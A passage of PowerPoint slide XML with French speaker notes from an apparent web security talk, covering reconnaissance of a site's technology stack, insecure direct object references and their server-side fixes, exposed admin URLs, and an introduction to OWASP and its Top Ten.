                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="91666"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>Ils ont été en mesure de déterminer :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="76200" rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="91666"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>le nom du CMS (commentaire auto généré dans le code par le CMS, appel des assets du CMS)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="76200" rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="91666"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>la base de données (nom de variable dans le code JS)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="76200" rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="91666"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>le conteur de servlet jsp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="76200" rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="91666"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>framework de sécurité était spring sécurity (nom de la méthode de connexion j_spring_security_check)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="76200" rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="91666"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>le load balancer : le deboggage avait était laissé activé (header http)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="1200" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>Conclusion de cette slide : plus le hacker connaît d’informations sur votre système, plus sa tâche sera facilité.</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20000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>Au delà de la récupération d’informations système on peut aussi récuperer des informations sur les </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>données même</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t> du site</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r>
              <a:rPr lang="fr" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>Souvent dans nos URL on expose des références (</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>identifiant fonctionnels</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t> - nom d’une catégorie,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>clé de base de donnée</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t> - id de produit, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>liens</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t> - redirection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>ses clés sont généralement générés de manière </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>sequentielle par la BDD</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>A coup de +1 -1 =&gt; Oscar peut tenter d’acceder à d’autres données… </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>Generer un</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>e valeur aleatoire </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>complexifie le pb =&gt; verifier que l’utilisateur à les droits sur la donnée</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="91666"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Rajouter une vérification côté Serveur : utilisateur propriétaire du produit</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r>
              <a:rPr lang="fr" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>Transforme la référence par une autre qui n’apporte aucune info sur l’id du produit en BDD avec table de correspondance </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>Si je vous en parle c’est parce que sur l’un de mes projets nous avions détecté le problème sur l’action de récupération de la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>facture</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>. On envoyait le numéro de la facture en paramètre mais il y avait eu loupé car on ne vérifiait pas que la facture appartenait à l’utilisateur authentifié…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>La vérification bien évidemment faite côté serveur. Côté serveur Oscar ne peut pas omettre cette vérification.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>Pas surcouche</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>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lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="91666"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>La liste d’url que vous voyez là n’est pas anodine. Elle correspond aux url crawlées par des bots sur mon projet actuel.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="91666"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>On peut voir des fichiers d’installation de phpmyadmin ou des scripts des urls d’admin.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="91666"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>Les fonctionnalités relatives à l’administration du serveur ne doivent pas être accessibles dans la mesure où elles peuvent apporter des vulnérabilités supplémentaires sans pour autant améliorer la qualité du service apporté aux utilisateurs.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="91666"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ces services non désirés sont identifiés via le balayage des ports, le parcours des répertoires et l’analyse des méthodes supportées par le serveur.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20000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="78571"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>La majorité des failles et vulnérabilités présentées sont recensés par l’OWASP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="78571"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A main levée, qui a déjà entendu parlé de l’OWASP ?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="78571"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Pour ce qui ne connaissent pas, l’OWASP est une communauté en ligne créée en 2001 travaillant sur la sécurité des applications Web. Sa philosophie est d'être à la fois libre et ouverte à tous. Elle publie des recommandations, de propose des méthodes et outils de référence en sécurité.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>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Shape 4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2" name="Shape 4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65600"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Quelques projets de l'OWASP :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-228600" rtl="0">
              <a:lnSpc>
                <a:spcPct val="165600"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OWASP Top Ten : liste des 10 risques de sécurités les plus critiques pour une application web. Ces failles sont en perpétuelles évolutions le top TEN, donc rien est acquis. La dernière mise à jour date de 2 ans.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-298450" rtl="0">
              <a:lnSpc>
                <a:spcPct val="165600"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Pour chaque risque il est fourni :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="0" indent="457200" rtl="0">
              <a:lnSpc>
                <a:spcPct val="165600"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A description</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="fr">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	Example vulnerabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="0" indent="457200" rtl="0">
              <a:lnSpc>
                <a:spcPct val="165600"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Example attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="0" indent="457200" rtl="0">
              <a:lnSpc>
                <a:spcPct val="165600"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Conseils pour ne pas reproduire ces failles</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="0" indent="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="165600"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="0" indent="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="165600"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Vous voyez à l’écran le tableau de risque des failles présentes dans le top 10.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="0" indent="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="165600"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>On voit par exemple que les injections SQL sont faciles à exploiter, que leur fréquence et que leur impact est énorme</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="0" indent="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="165600"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>En revanche, les XSS sont plus difficile à exploiter mais sont très largement répendues.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="0" indent="0" rtl="0">
